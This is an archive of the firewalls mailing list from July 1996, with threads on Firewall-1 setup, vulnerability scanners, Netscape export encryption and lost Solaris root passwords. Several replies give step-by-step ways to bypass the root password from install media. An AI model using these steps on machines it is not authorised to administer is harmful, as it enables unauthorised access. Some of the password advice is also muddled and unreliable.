From firewalls-owner Wed Jul 17 11:45:59 1996
From: Earl Evans
Reply-To: e_evans@ix.netcom.com
Date: Wed, 17 Jul 1996 10:50:01 -0700
To: firewalls@greatcircle.com
Subject: FW-1: Network Object Definition

Hi everybody,

I am trying to figure out how to define some basic network objects on
Firewall-1. I've read the manual thoroughly and am still confused. Perhaps
some kind soul can give me a hand.

My internal network is 10.x.x.x (unregistered, IANA recommendation), and is
composed of a collection of subnets connected to a backbone. One of the
interfaces of my Firewall-1 box will be connected to this backbone. The
other interface of the FW-1 box will be connected to my DMZ, which is then
routed to the Internet. My intent is to use NAT to translate the internal
addresses to valid ones on the DMZ. I believe this is a fairly
straightforward and common setup.

I would like to create network objects which represent the internal net and
the Internet so that I can proceed with entering rules in the Rule Base. My
problem is understanding the specific FW-1 mechanics used to define these
objects.

Some specific issues:

When defining a network object, the dialog box asks for a particular IP
address. This is odd, because IP networks are generally designated x.y.z.0
(I'm assuming class C in this example), where x.y.z is the network portion
and .0 represents the network. There is a space for the subnet mask in the
dialog box... can I assume that the host portion of the address is ignored
and that any host on the resultant net matches that object?

Although I've used class C subnetting on the internal internetwork (multiple
nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the
FW-1 network object to represent the whole internal network - i.e., 10.x.y.z
netmask 255.0.0.0? Would this work, or would I be confusing the system?

Lastly, based on what the manual did contain, I'm thinking the way to
represent the Internet is to first define the internal net and then use the
negate feature to designate "everything else". Is this accurate?

Any insight would be greatly appreciated, including the mechanics of the
process.

Thanks and Regards,

Earl Evans
--
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]  Earl Evans                "I thought,                []
[]  e_evans@ix.netcom.com      therefore I was"          []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Wed Jul 17 12:23:35 1996
From: Itsik Rubin
Organization: Isis (Pty) Ltd
Date: Wed, 17 Jul 1996 20:54:13 +0200
To: alexf@iss.net
CC: firewalls@GreatCircle.COM
Subject: Satan like utilities for Windows-NT

Are there any Satan-like utilities that run under Windows-NT?

Any plans for the future?
Thanks
Itsik

From firewalls-owner Wed Jul 17 12:41:48 1996
From: dengland@ivac.com (Dave England)
Date: Wed, 17 Jul 96 11:43:26 PDT
To: firewalls@greatcircle.com
Subject: Security issues with Web server on firewall

Other than the cgi ramifications, is the CERN HTTP server secure as my
outside Web server if run on a firewall proxy? If not, what are the
potential risks that I need to consider?

thanks - and I'll summarize.

From firewalls-owner Wed Jul 17 12:52:32 1996
From: "A. Ian Vogelesang"
Organization: Hitachi Data Systems
Date: Wed, 17 Jul 1996 09:28:59 -0700
Newsgroups: comp.security.unix,comp.mail.sendmail
To: firewalls@greatcircle.com, qpopper@qualcomm.com, cert@cert.org
Subject: Patch removes POP3 users from /etc/passwd

Modifications to Sendmail, local delivery, popper, and poppassd have been
developed to move POP3 users out of /etc/passwd, and to run local delivery
and popper retrieval under a no-privilege uid.

Details at: http://www.hdshq.com/fixes/mail_patch

A. Ian Vogelesang

From firewalls-owner Wed Jul 17 13:18:40 1996
From: Ron DuFresne
Date: Wed, 17 Jul 1996 15:11:20 -0500 (CDT)
To: Bill Stout
cc: Firewalls@GreatCircle.COM
Subject: Re: RC4-128bit encryption for Netscape available

On Wed, 17 Jul 1996, Bill Stout wrote:

> You all probably know this by now, but yesterday Netscape announced
> availability of downloadable RC4-128bit encryption Server and Browser
> products to U.S. customers.
>
> http://www.netscape.com/
>

Yes, but as of about 20 mins ago, the download process for these products
was not functioning...

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Wed Jul 17 14:23:03 1996
From: "Alex F"
Organization: Internet Security Systems, Inc.
Date: Wed, 17 Jul 1996 17:13:38 +0000
To: alexf@iss.net, Itsik Rubin
CC: firewalls@GreatCircle.COM
Subject: Re: Satan like utilities for Windows-NT

> Are there any Satan-like utilities that run under
> Windows-NT?
>
> Any plans for the future?
>

The ISS Scanner is currently being ported to NT. The release date is slated
for 8/1, but we all know how that stuff goes....

Go to our website's download area and click on NT. You'll be prompted to
sign up for the ntscanner list (list for announcements, etc), or send email
to majordomo@iss.net with the message "subscribe ntscanner" in the body of
the message.

Thanks,

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F                      alexf@iss.net
Marketing Specialist        Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Wed Jul 17 14:48:28 1996
From: David W Grimsby
Date: Wed, 17 Jul 1996 14:40:42 -0700 (PDT)
To: "Steven C. Payne"
cc: Stefan Berg, firewalls@GreatCircle.COM
Subject: Re: [HELP] I lost root password!

"boot cdrom -s" is easier than going through the install procedure.

dwg

On Wed, 17 Jul 1996, Steven C. Payne wrote:

> > > Hello,
> > > This is a very emergency state to me!
> > > Someone broke my root password! and make it worse file system
> > > is crashing now!
> > >
> > > I use solaris 2.4, when i used sun os 4.1.3 i can modify root password
> > > by single user mode booting..
> > > But whenever I try, it asking me root password..
> > >
> > > Could you help me with this problem? How can I re-obtain root password?
> > > I know my asking for help is not suitable this mailing list. but
> > > nobody can help me..
> > >
> > > Anyway, thank you in advance..
>
> boot the machine with the cdrom, or over the net, go through
> the install procedures, mount the /root file system,
> modify the shadow file and reboot.
>
> this IS documented in the OS docs.
> spayne
>

From firewalls-owner Wed Jul 17 18:48:22 1996
From: PCA
Date: Wed, 17 Jul 1996 21:40:11 -0400
To: firewalls@greatcircle.com
Subject: CCMAIL MOBILE

All,

The client I was working for was trying to use CCMAIL Mobile externally to
pick up their email from their internal CCROUTER box. Unfortunately CCMAIL
Mobile uses tcp port 21 to transmit the email files to the client software,
but it doesn't use ftp commands to accomplish this. Hence on the Raptor
Eagle 3.1 you can't force the generic service passer to accept transparent
port 21, or proxyd to do this either. Since port 21 has always been
associated with ftp, it is inbred that the Raptor will, no matter what,
always try to accept ONLY ftp connections on port 21 and not anything else.

Has anyone encountered this? And yes, I know Lotus screwed up big time by
illegally using port 21, but my client, who has a major installed base of
CCMAIL, is at an impasse.

Thanks for any info you have.

--
==============================
Predictive Systems Inc.               ||
Managed Network Services Division     ||
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+    NARF, POIT!!!
Senior Systems Engineer               ||
P.C. Aviles                           ||
(212) 219-4400 // (201) 408-9088      ||
==============================

From firewalls-owner Wed Jul 17 19:18:36 1996
From: "WebMaster UPDATE"
Date: Wed, 17 Jul 1996 16:20:43 -0700
To: kkm@xkis.nnov.su, v-kenma@microsoft.com, alexshaw@msn.com
Cc: mark, mike, pete, conklin@emf.net
Subject: ANNOUNCE: ConferenceRoom 1.1 Release

WebMaster Update
------------------------------------------------------------------------------------------------
This is a Product Announcement. We apologize for the inconvenience. We
understand that this may offend some members, but think that this
information may be of interest to the list.
------------------------------------------------------------------------------------------------

WEBMASTER RELEASES CONFERENCEROOM 1.1, THE FIRST FULLY FUNCTIONAL INTERNET
RELAY CHAT (IRC) SERVER FOR WINDOWS NT AND 95.

"iNTERaCTIVATE yOUR wEB sITE"

Download your FREE EVALUATION today at
http://www.webmaster.com/frames/products/conferenceroom/cr-download.html

Key Features:

1. Tightly integrated with the web. Built in web interface server. Can
   interact with any Java-enabled browser. Allows user browser to become a
   chat client. For a demonstration, check out the Cafe at
   http://irc.webmaster.com/frames/webstrands/cafe/
   ConferenceRoom's chat client uses Java to provide a feature-rich and
   smooth experience that previously could only be found on the proprietary
   interfaces of CompuServe and America On-Line.

2. Easy administration. Take the pain away from chat serving. Easy Windows
   interface.

3. Built for Windows NT. High performance. Can also run on Windows 95.

4. It is ideal for those who need to deploy internal company networks,
   often called Intranets, as well as those who wish to connect to the
   Internet.

5. Or for those who want to form a virtual fly-fishing group.

6. Deployment is especially easy because ConferenceRoom communicates with
   UNIX® IRC Servers -- the only Windows NT® IRC server with this
   capability.

7. RFC 1459 and IRCD compatible.

8. ConferenceRoom is compatible with IRC networks. To connect to newly
   formed IRC networks, please E-Mail soil@webmaster.com.

Best Regards,
WebMaster Incorporated

Note: To remove yourself from this list, please E-Mail
updates@webmaster.com.

WebMaster Incorporated
Copyright ® 1995, 1996 WebMaster Incorporated. May not be reproduced in
whole or in part without express consent of WebMaster Incorporated.

From firewalls-owner Wed Jul 17 19:51:32 1996
From: Inno Eroraha
Date: Wed, 17 Jul 1996 22:38:32 -0400
To: firewalls@greatcircle.com
Subject: Network Security tools

I am interested in finding out about different firewalls and the
network/authentication protocols that they support. Can anyone point me to a
site where I can find this information without wading through the voluminous
literature of the different firewall vendors?

Also, I am interested in finding out if there is an Internet vulnerability
scanner (similar to Satan or ISS) that runs on the Windows 95 platform. Are
you familiar with a site or a tool that may be of use? I want to be able to
use this tool to probe any given host (whether UNIX machine or otherwise) to
assess the vulnerability of the system.

Thanks while I wait "impatiently" to hear from you!
-0- inno From firewalls-owner Wed Jul 17 20:03:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22968 for firewalls-outgoing; Wed, 17 Jul 1996 19:56:40 -0700 (PDT) Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA22932 for ; Wed, 17 Jul 1996 19:56:26 -0700 (PDT) Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id MAA06704; Thu, 18 Jul 1996 12:50:47 +1000 (EST) Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id MAA05664; Thu, 18 Jul 1996 12:53:31 +1000 (EST) Message-Id: <199607180253.MAA05664@shekel.firstpac.com.au> Subject: Re: RC4-128bit encryption for Netscape available To: dufresne@winternet.com (Ron DuFresne) Date: Thu, 18 Jul 1996 12:53:29 +1000 (EST) Cc: bill.stout@hidata.com, Firewalls@GreatCircle.COM In-Reply-To: from "Ron DuFresne" at Jul 17, 96 03:11:20 pm X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717 X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB From: Matthew Keenan X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ron DuFresne wrote this... > On Wed, 17 Jul 1996, Bill Stout wrote: >> You all probably know this by now, but yesterday Netscape announced >> availability of downloadable RC4-128bit encryption Server and Browser >> products to U.S. customers. >> http://www.netscape.com/ > Yes, but as of about 20 mins ago, the download process for these products > was not functioning... i wonder how secure it is? i know it checks street addresses and the like, but couldnt this be faked? also how does the (i assume) ftp server know that you are valid? or does it download via http? 
Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Wed Jul 17 21:33:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA28850 for firewalls-outgoing; Wed, 17 Jul 1996 21:21:53 -0700 (PDT) Received: from pinky.junction.net (pinky.junction.net [199.166.227.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA28836 for ; Wed, 17 Jul 1996 21:21:47 -0700 (PDT) Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by pinky.junction.net (8.6.12/8.6.12) with ESMTP id UAA26187 for ; Wed, 17 Jul 1996 20:29:32 -0700 Received: from localhost (michael@localhost) by sidhe.memra.com (8.6.12/8.6.12) with SMTP id VAA02377 for ; Wed, 17 Jul 1996 21:14:02 -0700 Date: Wed, 17 Jul 1996 21:14:00 -0700 (PDT) From: Michael Dillon To: firewalls@GreatCircle.COM Subject: More hacker info from Forbes In-Reply-To: <2.2.32.19960718014011.006bed84@204.243.240.5> Message-ID: Organization: Memra Software Inc. - Internet consulting MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody read this Forbes article? http://www.forbes.com/asap/6396/hack.htm It might be a real eye-opener... Michael Dillon - ISP & Internet Consulting Memra Software Inc. 
- Fax: +1-604-546-3049 http://www.memra.com - E-mail: michael@memra.com

From firewalls-owner Thu Jul 18 02:48:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA10571 for firewalls-outgoing; Thu, 18 Jul 1996 02:36:00 -0700 (PDT) Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA10556 for ; Thu, 18 Jul 1996 02:35:47 -0700 (PDT) Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 11:32:11 +0200 From: peter.maersk-moller@jrc.it (Peter Maersk-Moller) Message-Id: <199607180932.LAA02362@ceo0912.jrc.it> To: updates@webmaster.com Subject: Re: ANNOUNCE: ConferenceRoom 1.1 Release Cc: firewalls@Greatcircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: 2foQf8TDA4bQwxrRrXjMrQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

How many useless MB of mail and denial of services do you want in reply to your commercial junk? One line of mail would have been more appropriate. Something like "New release of xxxxxx. Info can be found on http://xxxxx". I won't spam you this time, but next time I will.
Peter

From firewalls-owner Thu Jul 18 04:33:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA14416 for firewalls-outgoing; Thu, 18 Jul 1996 04:28:05 -0700 (PDT) Received: from daneel-internal.medcom.se (ns.medcom.se [194.213.80.20]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA14403 for ; Thu, 18 Jul 1996 04:27:53 -0700 (PDT) Received: by daneel-internal.medcom.se; id NAA28978; Thu, 18 Jul 1996 13:26:23 +0200 Received: from panpc.medcom.se(194.16.52.110) by daneel.medcom.se via smap (V3.1.1) Message-ID: <31EE2C08.2CCA@medcom.se> Date: Thu, 18 Jul 1996 13:20:24 +0100 From: Pär Ahrén Reply-To: pera@medcom.se Organization: Media Communications Eur AB X-Mailer: Mozilla 3.0b5a (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: RE: [HELP] I lost root password! Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Date: Wed, 17 Jul 1996 18:10:22 +1000
>From: Juyoung Park
>Subject: [HELP] I lost root password!
>
>Hello,
>This is a very urgent situation for me!
>Someone has broken my root password! and to make it worse the file system is
>crashing now!
>
>I use solaris 2.4, when i used sun os 4.1.3 i could modify the root password by
>single user mode booting..
>But whenever I try, it asks me for the root password..
>
>Could you help me with this problem? How can I re-obtain the root password?
>I know my asking for help is not suitable for this mailing list. but nobody can
>help me..
>
>Anyway, thank you in advance..

What I did was (if I can remember it right :-) disconnect the machine from the net!
a) First log in as a normal user and check the mount point for /etc (it's the / partition I think)
b) Turn the power off (You can't do a clean halt without the root password)
c) boot from the install CD (or tape) and press ctrl+c to get a shell
d) mount the disk (the one in _a_) to /tmp or some other directory that's empty
e) edit the /etc/passwd file and remove the root password
f) turn off the power or halt
g) boot from the disk
h) login as root no password
i) change the root password
DONE!

--
Pär Ahrén, Technical Consultant Media Communications Eur AB (publ) Phone: +46(0)8 21 77 88 Fax: +46(0)8 21 95 05 Mobile: +46(0)708 76 01 30 Video: +46(0)8 440 22 55 (H.320) E-Mail: pera@medcom.se Web: http://www.medcom.se/pera

From firewalls-owner Thu Jul 18 05:18:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16293 for firewalls-outgoing; Thu, 18 Jul 1996 05:02:25 -0700 (PDT) Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16279 for ; Thu, 18 Jul 1996 05:02:08 -0700 (PDT) Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id NAA09422; Thu, 18 Jul 1996 13:59:05 +0200 Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id NAA29706; Thu, 18 Jul 1996 13:58:45 +0200 (MET DST) Message-Id: <199607181158.NAA29706@auryn.genua.de> To: "A.
Ian Vogelesang" cc: Firewalls@greatcircle.com Subject: Patch removes POP3 users from /etc/passwd MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <29703.837691124.1@auryn.genua.de> Date: Thu, 18 Jul 1996 13:58:44 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Modifications to Sendmail, local delivery, popper, and poppassd
> have been developed to move POP3 users out of /etc/passwd, and
> to run local delivery and popper retrieval under a no-privilege
> uid.

I think (without looking too closely at Ian's stuff) that something similar has been available since 1993 (or earlier?) in the MH package (originally the RAND Mail Handler, by Marshall T. Rose, later versions from UCI and lots of other places. The Only Real Mail Handler :-). Take a look at spop.

\Bernhard.

PS: There's no need to hack sendmail (but maybe some fun?)
PPS: What does this have to do with Firewalls?

From firewalls-owner Thu Jul 18 05:33:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17279 for firewalls-outgoing; Thu, 18 Jul 1996 05:29:16 -0700 (PDT) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA17254; Thu, 18 Jul 1996 05:29:09 -0700 (PDT) Message-Id: <199607181229.FAA17254@miles.greatcircle.com> Received: by habanero.jmu.edu Date: Thu, 18 Jul 1996 08:25:21 -0400 From: gary flynn To: dufresne@winternet.com, firewalls-owner@GreatCircle.COM Subject: Re: RC4-128bit encryption for Netscape available Cc: Firewalls@GreatCircle.COM, bill.stout@hidata.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> > On Wed, 17 Jul 1996, Bill Stout wrote:
> >
> >> You all probably know this by now, but yesterday Netscape announced
> >> availability of downloadable RC4-128bit encryption Server and Browser
> >> products to U.S. customers.
> > >> http://www.netscape.com/
> >
> > Yes, but as of about 20 mins ago, the download process for these products
> > was not functioning...
>
> i wonder how secure it is? i know it checks street addresses and the
> like, but couldn't this be faked? also how does the (i assume) ftp
> server know that you are valid? or does it download via http?
>
> Matt

Either the government is even more technologically inept than I thought, or Netscape really pulled one over on them. There's no way this provides any control over the code. What's to stop someone in-country from putting up a gateway or simply sucking it down and making it generally available? What a waste of taxpayer money.

From firewalls-owner Thu Jul 18 06:33:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20948 for firewalls-outgoing; Thu, 18 Jul 1996 06:28:23 -0700 (PDT) Received: from aia04.aia.af.mil ([137.242.150.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20941 for ; Thu, 18 Jul 1996 06:28:07 -0700 (PDT) Received: by aia04.aia.af.mil (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 08:25:03 -0500 From: rmcdermo@aia04.aia.af.mil (CSC Bob McDermott) Message-Id: <199607181325.IAA03419@aia04.aia.af.mil> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #423 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-MD5: VhObZHVergFnKpxsCAfKBA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

oops, the previous message I sent you was for SunOS 4.1.X. For Solaris 2.4, after you boot off the cdrom and mount your disk's root file system, copy over the files /etc/password and /etc/shadow onto your hard drive. If you mounted your drive's root filesystem as /mnt then copy the above files to /mnt/etc/password and /mnt/etc/shadow.
Good Luck again, Ken From firewalls-owner Thu Jul 18 06:52:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20812 for firewalls-outgoing; Thu, 18 Jul 1996 06:25:38 -0700 (PDT) Received: from aia04.aia.af.mil ([137.242.150.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20805 for ; Thu, 18 Jul 1996 06:25:32 -0700 (PDT) Received: by aia04.aia.af.mil (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 08:21:35 -0500 From: rmcdermo@aia04.aia.af.mil (CSC Bob McDermott) Message-Id: <199607181321.IAA03416@aia04.aia.af.mil> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #423 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-MD5: 3KakVhb3wjo43kxMctfeSQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First, reboot your computer from the SunOS cdrom by typing "boot cdrom" from the boot prompt. Second, exit the installation program. Third, mount the root filesystem on your hard drive by typing "mount /dev/rsd# /mnt" Fourth, edit the /mnt/etc/passwd file and delete the encrypted password for root. Finally, reboot your computer. When you login as root, the system will ask you for a new password. 
Good luck, Ken

From firewalls-owner Thu Jul 18 07:00:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20690 for firewalls-outgoing; Thu, 18 Jul 1996 06:22:01 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20672 for ; Thu, 18 Jul 1996 06:21:52 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id JAA08499; Thu, 18 Jul 1996 09:23:40 -0500 From: Adam Shostack Message-Id: <199607181423.JAA08499@homeport.org> Subject: Re: Netcat To: jwb@xioa.cosmic.org (Joe Beiter) Date: Thu, 18 Jul 1996 09:23:39 -0500 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199607171302.NAA06134@xioa.cosmic.org> from "Joe Beiter" at Jul 17, 96 01:02:09 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Joe Beiter wrote:
| Does anyone have any feelings on using netcat to create "pipes" through
| a firewall situation to port in things like news? We are using two ciscos
| with a dmz area between them.

Don't compile with -DGAPING_SECURITY_HOLE. :)

After that, why would you prefer nc to plug-gw? nc would need to combine with tcpd to get the netacl abilities of plug-gw, and doesn't log. So I don't see what you stand to gain, and do see it as more work for less capabilities.

Adam

-- "It is seldom that liberty of any kind is lost all at once."
-Hume From firewalls-owner Thu Jul 18 07:03:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21786 for firewalls-outgoing; Thu, 18 Jul 1996 06:46:26 -0700 (PDT) Received: from LIVEDGAR.gsionline.com (livedgar.gsionline.com [204.254.209.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA21773 for ; Thu, 18 Jul 1996 06:46:19 -0700 (PDT) Received: from [204.254.209.10] by LIVEDGAR.gsionline.com (NTMail 3.02.04) id oa011740; Thu, 18 Jul 1996 09:43:15 -0400 X-Sender: nbk@livedgar X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Michael Dillon From: nkeenan@gsionline.com (Nick Keenan) Subject: Re: More hacker info from Forbes Cc: firewalls@GreatCircle.COM Date: Thu, 18 Jul 1996 09:43:15 -0400 Message-Id: <13431572604594@gsionline.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Has anybody read this Forbes article? > >http://www.forbes.com/asap/6396/hack.htm > Hmm. It seems like these kids pulled the wool over the reporter's eyes pretty good. From firewalls-owner Thu Jul 18 07:18:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22196 for firewalls-outgoing; Thu, 18 Jul 1996 06:53:13 -0700 (PDT) Received: from Concord01.POP.InterNex.Net (Concord01.POP.InterNex.Net [205.158.3.82]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA22187 for ; Thu, 18 Jul 1996 06:53:05 -0700 (PDT) Message-Id: <199607181353.GAA22187@miles.greatcircle.com> Received: from [205.158.182.130] by Concord01.POP.InterNex.Net Subject: Re: CERT Advisories (was: Re: Dirty dogs) Date: Thu, 18 Jul 96 06:49:41 -0800 x-sender: INX-10108b@Concord01.POP.InterNex.Net x-mailer: Claris Emailer 1.1 From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Received: 7/17/96 7:04 AM >From: David J. 
Meltzer, davem@iss.net
>
> There are several mailing lists that
>are commonly used by security professionals to initially report problems
>(Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it
>is vital that any security administrator stays current with anything relevant
>being posted to these.

I am interested in finding out more about these mailing lists. Do you have more information on them? Is there a reference site somewhere that discusses what mailing lists are available to Security professionals for these sorts of reports and alerts?

Thanks, Bill

From firewalls-owner Thu Jul 18 07:33:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21851 for firewalls-outgoing; Thu, 18 Jul 1996 06:47:37 -0700 (PDT) Received: from hqmail.usda.gov ([199.128.3.90]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA21811 for ; Thu, 18 Jul 1996 06:47:25 -0700 (PDT) Received: by hqmail.usda.gov Date: Thu, 18 Jul 1996 9:42:00 -0400 From: "Hassan Karim" Message-Id: <31EE5171.1DBD.438C.000@MHS> Subject: Hostile attack (was Dirty Dogs) To: firewalls@GreatCircle.COM (Receipt Notification Requested) X400-Mts-Identifier: [ /P=GOV+USDA/A=ATTMAIL/C=US/ ; 31EE5171.1DBD.438C.000 ] X-Mailer: Worldtalk (4.0.2-p8)/STREAM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I would perceive it as hostile but not really be too concerned because you weren't successful. However, if you had been successful then the proper legal actions would have been taken. And since I work for the government, I think I would have had to involve the Secret Service or other White House Security.

>>> firewalls-owner@GreatCircle.COM@i 07/12/96 06:38pm >>>
Precedence: bulk

On Fri, 12 Jul 1996, Matthew Keenan wrote:
> and try snmp probing the routers closest to the target address.

Querying whois and dns is one thing, but some sites might conceive your probing their routers as hostile action. For the list: Would you?
Would you detect it? ;) Cheers. - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From firewalls-owner Thu Jul 18 07:42:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22355 for firewalls-outgoing; Thu, 18 Jul 1996 06:54:55 -0700 (PDT) Received: from telxon (telxon.mis.telxon.com [149.23.2.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA22328 for ; Thu, 18 Jul 1996 06:54:38 -0700 (PDT) Received: from sbridg.mis.telxon.com by telxon (SMI-8.6/SMI-SVR4) Received: from Connect2 Message Router by sbridg.mis.telxon.com Message-ID: <9E199D6001DA0000@sbridg.mis.telxon.com> Date: Thu, 18 Jul 96 9:53:00 -0400 From: "Wojno, Jim" Organization: Telxon To: firewalls@greatcircle.com (Firewalls) Subject: RE: [HELP] I lost root password! MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Someone broken my root password! >> >>I use solaris 2.4, when i used sun os 4.1.3 i can modify root password by >>single user mode booting.. >e) edit to /etc/passwd file and remove the root password This will not work on Solaris, only SunOS 4.1.X. Starting with Solaris 2.1, the encrypted passwords are not stored in /etc/passwd, as this is a globally readable file. (As such, vulnerable to crack, and other password cracking programs). The encrypted password is now stored in /etc/shadow, which only root can read. An edit to the /etc/passwd file will invalidate the file without performing a "pwconv" to rebuild the /etc/shadow file. Unfortunately, there is no command line modifier for pwconv to specify which shadow file to rebuild. Since /etc in this case is *not* the /etc you want to change, editing will not solve the problem. 
My suggestion is that after booting the CD into single user mode, and mounting the root partition, use ufsrestore to restore *both* the /etc/passwd, and the /etc/shadow files from a known good backup tape. This will restore the root password to what it was before the change. Once done, reboot and change the password to whatever you like. The only possible problem is that if any other passwords were legitimately changed between the time of the backup and the time of the restore, those passwords will now be what they were at the time the backup was made. If this is a major problem, you might be able to restore both /etc/passwd and /etc/shadow to a temp area, then replace only the root entries in the current files with the entries in the restored files. Please note that while I have been successful in restoring the full /etc/passwd and /etc/shadow file for similar situations, I haven't tried replacing individual lines. It should work, but I can't be 100% sure of this, as I have never done it. 
